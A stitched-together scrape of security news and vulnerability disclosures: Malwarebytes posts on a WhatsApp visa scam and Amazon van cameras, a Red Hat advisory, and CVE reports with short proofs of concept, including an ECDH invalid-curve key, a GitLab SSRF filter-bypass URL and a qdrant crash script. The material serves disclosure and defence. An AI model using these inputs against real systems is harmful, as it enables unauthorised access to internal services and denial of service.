We take a look at a site claiming to offer "free" visa access to the UK via WhatsApp. All is not quite as it seems.
The post “Free UK visa” offers on WhatsApp are fakes appeared first on Malwarebytes Labs.

A student friend recently shared a WhatsApp message, unsure if it was scam. The message claims to offer an easy to route to free visas, housing, accommodation, and medicine access.

Here’s how we know it was a scam, and where it lead.

It read as follows:

> **UK GOVERNMENT JOB RECRUITMENT 2022**: This is open to all Individuals who wants to work in UK, Here is a great chance for you all to work conveniently in the UK. UK needs over 132,000 workers in 2022. Over 186,000 Jobs are Open for applying. THE PROGRAM COVERS: Travel expense. Housing. Accommodation. Medical facilities. Applicant must be 16 years or above. Can speak basic English. BENEFIT OF THE PROGRAM: Instant work permit. Visa application assistance. All nationalities can apply. Open to all individuals and students who want to work and study. Apply here \[url removed\]

As you might suspect, there’s multiple red flags in the above claims for anyone considering signing up.

**The bogus visa claim checklist**

The site gives the impression of being operated by UK Visas and Immigration, and repeats some of the errors and red flags from the WhatsApp message.

“We are hiring”

It said:

We are urgently looking for foreigners to apply for the thousands of jobs already available in the United Kingdom. This application is free and upon approval you will be given a work permit, visa, plane tickets and accommodation in the UK for free.

With even the most cursory of glances, the claims on this website simply don’t add up. Let’s dissect some of them:

1.  UKVI applications all begin here, on a gov.uk address. This scam site is not hosted on a gov.uk address.
2.  The Home Office does _not_ cover the cost of flights or accomodation for visa applicants coming to the UK.
3.  There is no free access to medical services in the UK. Visa holders pay an annual immigration health surcharge to access NHS services. This is paid upfront at visa application time.
4.  The minimum age requirement for a skilled work visa is 18, not “16 years or above”.
5.  In most cases, applicants need to be able to demonstrate English ability through one of several available qualifications, not just “can speak basic English”.
6.  You won’t get an “Instant work permit” without paying an additional fee to make use of same day / next day processing.

**It’s website quiz time**

The site posed two questions, including marital and employment status. It then asks for first and last name, email address, and phone number. No matter what I entered, or even if I left all the form elements blank, I always got the following message:

> After checking your applications, You have been approved to work in the United Kingdom 2022

I most certainly had not. It continued:

> –Your UK VISA FORM will be available immediately after you click the “Invite Friends/Group” button below to share this information with 15 friends or 5 groups on WhatsApp so That They Can Also be Aware of the PROGRAM.

Unlike other sites along the same lines, this one didn’t check if I really was sending the link to people on WhatsApp, so I faked it. Did I get my visa after “sharing” the scam?

No, I did not.

**A distinct lack of visa forms**

The clue is definitely in the title. Instead of the promised form, I was greeted by the following message:

No visas yet

> To facilitate the downloading of your UK VISA FORM you must complete this final step of Nationality Verification!
> 
> 1.Click the Continent you are from and complete the given tasks, verification is by phone number or downloading, registering e.t.c.
> 
> (Remember, this step is very important, add your phone number to verify)
> 
> Do not skip any step..

I think my favourite part about all of this is that they used the logo for VISA, the financial multinational corporation. At this point, why not?

**Of redirects and surveys**

Whether I choose “Africa” or “Other Continent”, I was directed to several sites selling drones and watches or asking for mobile numbers, alongside yet more quizzes. The visa forms? Not so much.

This is not what a visa form looks like

While digging around for more information on the site involved in this, I came across this article from the last day or so. Clearly, this site is doing the rounds in WhatsApp circles. There’s also some additional UK visa-related scams listed there too, one of which was bouncing around a few months ago. All in all, this is yet another “if it’s too good to be true” escapade and should be avoided.

“Free UK visa” offers on WhatsApp are fakes

Categories: News
Tags: driver

Tags:  delivery

Tags:  amazon

Tags:  van

Tags:  camera

Tags:  recording

Tags:  footage

Tags:  online

Tags:  privacy

In-van delivery driver footage is reportedly finding its way to the internet. Are privacy issues at play, or is a valuable safety tool?



(Read more...)




The post Amazon in-van delivery driver footage makes its way online appeared first on Malwarebytes Labs.

Footage from technology used to monitor Amazon delivery drivers is leaking onto the internet. AI-enabled equipment which keeps an eye on the drivers’ speed, location, and other activities is part of the growing trend of workplace surveillance. In theory where drivers are concerned it could flag a lack of seat belt, or running red lights.

In practice the drivers aren’t too keen and insist that the companies using this tech can trust them without having a camera in their face all day long. There are other privacy issues to consider too.

When you receive a delivery nowadays, it’s not unusual for drivers to take a photo at the doorstep. You may or may not be present when these images are taken, but you’ll often see them on the web-based “parcel delivered” status page. If you’re lucky, your pyjamas are safely out of shot.

You may have wondered about the privacy issues related to these photographs. On the one hand, they’re attached to a URL online somewhere and they sometimes have your house number in shot. On the other hand, there’s a good chance nobody cares, those parcel delivered links tend to be temporary, and you’re not posing and waving alongside your delivery.

Why does this matter? Well, filmed footage takes in a lot more than a static, split-second shot of your doorstep. If a camera is rolling when a delivery person reaches your home, you could end up in the video footage or even just via the recorded audio should it exist. Ever had a casual chat with your driver? It could be in one of these recordings somewhere.

The cameras used are able to record both road and driver, with Vice reporting that drivers must consent to their biometric data being collected so their actions can be recorded “properly”. Despite this, there are examples of the cameras incorrectly penalising drivers.

Meanwhile the current clips are leaking to sites like Reddit, and nobody is sure who is doing it for the most part. Drivers claim they don’t have access to the footage: only Amazon, the technology maker, and the delivery service partner (DSP) which is the firm making the actual delivery.

On the Subreddit in question, drivers confirm that there is no live feed, but “dispatchers” on the other end can check-in, and drivers can request a pull up of specific footage as seems to be the case in this example. Whether the footage should be requested and dropped online is a different question. With drivers already worried about potential privacy issues of clips making their way to the internet, it’s probably not helpful if some drivers are contributing to the steady flow.

This isn’t the first time footage has appeared online, even if it seems to be more common now. Back in February of this year, one driver shared details of the AI system tracking her moments to a TikTok video which went viral. In that instance, she described the van’s four cameras (one forward facing, two on the side, and one facing her) and how they work together to “ding” her with a violation should she do something against the rules. Even there, she references a driver receiving a “distracted driver violation” for itching his beard which the system considered to be him using a phone while driving. Drivers can contest these supposed violations, but it all gives the impression of a system somewhat at war with itself.

Amazon's stance on this technology is clear: It's a valuable and necessary tool to ensure drivers are doing the right thing and not causing problems for other drivers. From Amazon's comments to Business Insider:

> "The safety technology in delivery vans help keep drivers and the communities where we deliver safe, and claims that these cameras are intended for anything else are incorrect. Since we started using them, we've seen a 35% reduction in collision rates across the network along with a reduction in distracted driving, speeding, tailgating, sign and signal violations, and drivers not wearing their seatbelts."

As for people receiving the packages, this is more of a problem for drivers than the recipients for the most part. However, it would be a shame if this ends up encouraging a lack of interaction with the folks bringing you your packages on a daily basis. 

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Amazon in-van delivery driver footage makes its way online

Red Hat Security Advisory 2022-6317-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.48. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.9.48 bug fix and security update  
Advisory ID:       RHSA-2022:6317-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6317  
Issue date:        2022-09-12  
CVE Names:         CVE-2021-39226 CVE-2022-0494 CVE-2022-1353   
                   CVE-2022-2526 CVE-2022-29154   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.9.48 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.9.48. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2022:6319

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Security Fix(es):

* grafana: Snapshot authentication bypass (CVE-2021-39226)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

You may download the oc tool and use it to inspect release image metadata  
as follows:

(For x86_64 architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.48-x86_64

The image digest is  
sha256:fe63bce8c63031a17f08feed4fae704499b749502cb3d51f5df7d8eb002e8e55

(For s390x architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.48-s390x

The image digest is  
sha256:cc5c418771b024b65af22f306c24483421c2e3b351004df1948dc3e9af25b424

(For ppc64le architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.48-ppc64le

The image digest is  
sha256:162a33695defc9acd595451c13ec96eae4557642d6a51521f2aeac22f1c02b8c

All OpenShift Container Platform 4.9 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1996013 - sriov-device-plugin cannot found the VF  
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass  
2096508 - Pod stuck in Terminating, runc init process frozen  
2097724 - Change Ping source spec.jsonData (deprecated) field  to spec.data  
2101092 - Reserved port 9104 prevents a roll out of new cluster-network-operator Pod during SNO 4.10 upgrade  
2101794 - On-prem loadbalancer ports conflict with kube node port range

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-410 - Detect unsupported amount of workloads before rendering a lazy or crashing topology  
OCPBUGS-420 - OVS-Configure doesn't iterate connection names containing spaces correctly  
OCPBUGS-443 - [release-4.9] Gather ODF CephCluster resource status  
OCPBUGS-459 - Default catalogs fails liveness/readiness probes  
OCPBUGS-508 - CI failing tests: Create namespace from install operators creates namespace from operator install page  
OCPBUGS-572 - Machine Controller stuck with Terminated Instances while Provisioning on AWS

6. References:

https://access.redhat.com/security/cve/CVE-2021-39226  
https://access.redhat.com/security/cve/CVE-2022-0494  
https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-2526  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYx+EqtzjgjWX9erEAQhj7hAAk1mCFen6d+pVH7k/XA7d+jL2zi5VpxPb  
R96JdAiNK/Pbx6aRYa3K/9q5FsTjGYOq0ycOt6g2GG21vBLTF07KIXRhtV9L7+d+  
SVffQsFprfM4cgClzaZ6qPYWwUNZo3VyfYLbVG49Z7jFxXmUjsxMGG68qgtyJiWJ  
9Dpk1GtC/xXpLsqH+/s56evRijry/iWNqHXLX/fzGQyKBgTGZMPdix53vKqBb90t  
OvPTdc9WnE68jHRK1nxKHkHGdE85mjtTeSX8ELhjwhDmTWFjdrxfmZ/doDAt313l  
VF3uvIoxTmroiUxvxn/kuVphBxbSombgZmBh3+Y53K9RQVqpR3YGo/MDk/B18QwE  
fWcWnbxJTwI+wGrW5+a/pYMlqVwqIYRX7G1fRlCQtVPg7VY6NELr145KoA4iEWGE  
nLSMpe3BbmRxeLlRB31cID10sYOO7JzR/OKkvQdGIH7OkCMLjxHIN9uyaADHTW6p  
7ii5T5LWKvRmuUlJgG0ToSAbk0wjN7LbPPDJPlo2gmiWj3Atdl3cv+475XXeGRTM  
FpAOlcSkDHTmTVxOvYUB1L/8zkTSyLPDbAIXdZi52mai6gOiBrQqOzJozZa9jnh/  
xHnAoeBU8m0Jn2Op7R5NGx5P7I+roQDnz621IUPwpeeNO2botw7f9qi/wwPCaCC7  
x834/6/1kYE=  
=j6ax  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6317-01

Checkmk <=2.0.0p19 contains a Cross Site Scripting (XSS) vulnerability. While creating or editing a user attribute, the Help Text is subject to HTML injection, which can be triggered for editing a user.

Component

Setup

Title

Persistant XSS in Custom User Attributes

Date

Jan 27, 2022

Checkmk Editon

Checkmk Raw (CRE)

Checkmk Version

2.0.0p20

Level

Prominent Change

Class

Security Fix

Compatibility

Incompatible - Manual interaction might be required

This Werk fixes a Persistant Cross-Site-Scripting (XSS) vulnerability. (CWE-79)

While creating or editing a _user attribute_ the _Help Text_ is subject to HTML injection. Which can be triggerd editing a user.

To mitigate this vulnerability ensure that only trustwothy users have the _User management_ and _Manage custom attributes_ rights.

Checkmk 1.6 is not subject to this vulnerability, but all 2.0 versions including 2.0.0p19.

If you have custom HTML code in the _Help Text_ this will no longer be rendered as HTML, but will be escaped.

To detect if this vulnerability is/was used you can check etc/check\_mk/multisite.d/wato/custom\_attrs.mk for HTML code. Please be aware that an attacker could delete the code after a attack.

CVE is requested and will be added later.

CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N (5.2 medium)

We thank Manuel Sommer for finding this vulnerability and bringing this to our attention.

To the list of all Werks

CVE-2022-24564: Persistant XSS in Custom User Attributes

In Development IL ecdh before 0.2.0, an attacker can send an invalid point (not on the curve) as the public key, and obtain the derived shared secret.

Hi.

Recently I found a vulnerability in

PrivateKey.prototype.deriveSharedSecret \= function(publicKey) {

, the deriveSharedSecret function only checks whether the format of the public key object is legal, but does not check whether its content is legal, this will lead to an invalid curve attack, an attacker can send an invalid point which not on the curve as public key, and then he can get the derived shared secret.

This is a classic attack method on ECDH, more details can be seen at https://crypto.stackexchange.com/questions/3820/why-do-public-keys-need-to-be-validated.

For example, if the attacker set the public key point to (0, 0), then the derived shared secret will always be 0:

    // Change Bob's public key to a invalid point which not on the curve, e.g. (0, 0)
    bobKeys.publicKey.Q.x.x = BigInteger.ZERO
    bobKeys.publicKey.Q.y.x = BigInteger.ZERO
    
    // Alice generate the shared secret:
    var aliceSharedSecret = aliceKeys.privateKey.deriveSharedSecret(bobKeys.publicKey);
    
    // the shared secret will always be 00000000000000000000000000000000
    console.log('shared secret:', aliceSharedSecret.toString('hex'));
    

Since I see there are also some other projects depend on this implementation, I think it might be necessary to check and fix this vulnerability.

You can also contact me if you have any other question, best wishes.

CVE-2022-44310: A security issue in ECDH derive shared secret · Issue #3 · developmentil/ecdh

GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.

Skip to content

Open Issue created Oct 26, 2018 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**SSRF in project integrations (webhook)**

**HackerOne report #429147** by nyangawa on 2018-10-26:

**Summary:** An invalid IP address check could be utilized to access any IP addresses including private IP addresses

**Description:** The validators in lib/gitlab/url_blocker.rb does not check URL's like http://[0:0:0:0:0:ffff:127.0.0.1]:6379, which is an IPv6 address but used to map to IPv4. Replacing the 127.0.0.1 part to any other IP addresses is also possible.

**Steps To Reproduce:**

(Add details for how we can reproduce the issue)

1.  Create a webhook in any existing projects, with URL like http://[0:0:0:0:0:ffff:127.0.0.1]:9100
2.  Test the webhook

**Supporting Material/References:**

I did several harmless tests on Gitlab.com. https://gitlab.com/Nyangawa/www-gitlab-com/hooks/415288

And verified it's possible in my 11.4.0 Gitlab docker instance.

**Impact**

Due to some limits of Gitlab's web hook, this is an blind SSRF issue without full response printed. But it is still possible for an attacker to send POST requests to internal services to do further penetration to the infrastructure.

CVE-2018-19571: SSRF in project integrations (webhook) (#53242) · Issues · GitLab.org / GitLab FOSS · GitLab

TP-Link Archer AX10(EU)_V1.2_230220 was discovered to contain a buffer overflow via the function FUN_131e8 - 0x132B4.

\# Exploit Title: Buffer Overflow in TP-Link Archer AX10(EU)\_V1.2\_230220

\# Exploit Author: Giuseppe Compare

\# Date : 26/05/2023

\# CVE: CVE-2023-34832

\# Vendor Homepage: https://www.tp-link.com/

\# Version: TP-Link Archer AX10(EU)\_V1.2\_230220

Buffer Overflow

There is a buffer overflow in the FUN\_131e8 function due to using sprintf improperly, detailed in line 47-49

memset(&DAT\_000283a4,0,0x800);

sprintf(&DAT\_000283a4,"echo \\'\[ %s \] %d: get OCN v6plus rules begin\\n \\' > /dev/console", "https\_get\_rules\_OCN",0x3c3); system(&DAT\_000283a4);

//line 47-49

sprintf((char \*)&local\_428, "https://rule.map.ocn.ad.jp/?ipv6Prefix=%s&ipv6PrefixLength=%d&code=e8mMWklYwaGoHmT05ynqVM4kPqF9rAUnhrWCp1vWvBeSOO0pfpMokg==" ,param\_2 + 0x23,param\_2\[0x2d\]);

The sprintf() function makes no guarantees regarding the length of the generated string, a sufficiently long string passed as an additional argument could generate a buffer overflow.

Remediation

Guarantee that storage for strings has sufficient space for character data and the null terminator.

Avoid using unsafe functions such as sprintf(), consider using snprintf() or sprintf\_s() and variants.

Double check that your buffer is as large as you specify.

Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.

CVE-2023-34832: CVE-2023-34832 : Buffer Overflow in TP-Link Archer AX10(EU)_V1.2_230220

In getCurrentState of OneTimePermissionUserManager.java, there is a possible way to hold one-time permissions after the app is being killed due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.



)\]}' { "commit": "fa539c85503dc63bfb53c76b6f12b3549f14a709", "tree": "7dbbee84c812cf1976d496a487d69c5394576152", "parents": \[ "c00b7e7dbc1fa30339adef693d02a51254755d7f" \], "author": { "name": "Evan Severson", "email": "evanseverson@google.com", "time": "Tue Jan 31 17:14:34 2023 -0800" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Thu May 11 18:40:45 2023 +0000" }, "message": "\[1-time permissions\] Use internal api to check proc states\\n\\nWe need to check the proc state and the binder method has a filter that\\nis affected by a bug that keeps a killed a proces in the \\"pending top\\"\\nlist. Using the internal api isn\\u0027t affected by this filter and also is\\nmore correct for inprocess calls.\\n\\nTest: Install test app that requests permission and will exit\\n immediately on granting, observe permission is no longer\\n\\tindefinitely held.\\nBug: 254736794\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:e836611f3057cf9eae589a34a39fe80d0a9145f3)\\nMerged-In: I30579090c803b231fd750abbc4ad645805f7ece2\\nChange-Id: I30579090c803b231fd750abbc4ad645805f7ece2\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "a1c98109052e22aa66876a0ee41d102e90bfbd76", "old\_mode": 33188, "old\_path": "services/core/java/com/android/server/pm/permission/OneTimePermissionUserManager.java", "new\_id": "d28048ce74c79e9258e8da43dc60fa8cfd8a834a", "new\_mode": 33188, "new\_path": "services/core/java/com/android/server/pm/permission/OneTimePermissionUserManager.java" } \] }

CVE-2023-21254

* Buffer Overflow vulnerability in qdrant v.1.3.2 allows a remote attacker cause a denial of service via the chucnked_vectors.rs component.

Wrong dim when create collection may cause db service down

**Current Behavior**

Denial of Service, Users can not use the vector database normally

**Steps to Reproduce**

some bugs related with the dim of vector when create collection, which can cause DoS  
Details

version: 1.3.2

at https://github.com/qdrant/qdrant/blob/master/lib/segment/src/vector\_storage/chunked\_vectors.rs#L28, it check cannot be 0, but vector\_size may be zero if dim too big such as 2\*\*63. Then it will divide zero

if dim is too big, the vector::new will failed on my 128G memory server, and service will down.  
PoC

    from qdrant_client import QdrantClient
    from qdrant_client import models
    
    c = QdrantClient(host="127.0.0.1", port=6333)
    c.recreate_collection(
        collection_name="test",
        vectors_config=models.VectorParams(size=2**63, distance=models.Distance.COSINE),
    )
    
    # [2023-05-30T08:25:32.996Z ERROR qdrant::startup] Panic occurred in file lib/segment/src/vector_storage/chunked_vectors.rs at line 28: attempt to divide by zero
    

    c = QdrantClient(host="127.0.0.1", port=6333)
    c.recreate_collection(
        collection_name="test",
        vectors_config={
            "payload": models.VectorParams(size=2**59, distance=models.Distance.DOT),
        }
    )
    
    #memory allocation of 2305843009213693952memory allocation of  bytes failed
    #2305843009213693952 bytes failed
    #Aborted (core dumped)
    

**Possible Solution**

check the value range

P.S This bug can also effect the cloud service

CVE-2023-38975: Wrong dim when create collection may cause db service down · Issue #2268 · qdrant/qdrant

This affects the package putil-merge before 3.8.0.
 The merge() function does not check the values passed into the argument. An attacker can supply a malicious value by adjusting the value to include the constructor property.

Note:  This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-PUTILMERGE-1317077



*   **Attack Complexity**
    
    Low
    
*   **Availability**
    
    High
    

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-PUTILMERGE-2391487
    
*   **published**
    
    3 Feb 2022
    
*   **disclosed**
    
    2 Feb 2022
    
*   **credit**
    
    Cristian-Alexandru Staicu, Abdullah Alhamdan
    

**How to fix?**

**Overview**

**Details**

**Types of attacks**

**Affected environments**

**How to prevent**

**References**

Search

lenovo warranty check/lookup | check warranty status | lenovo support us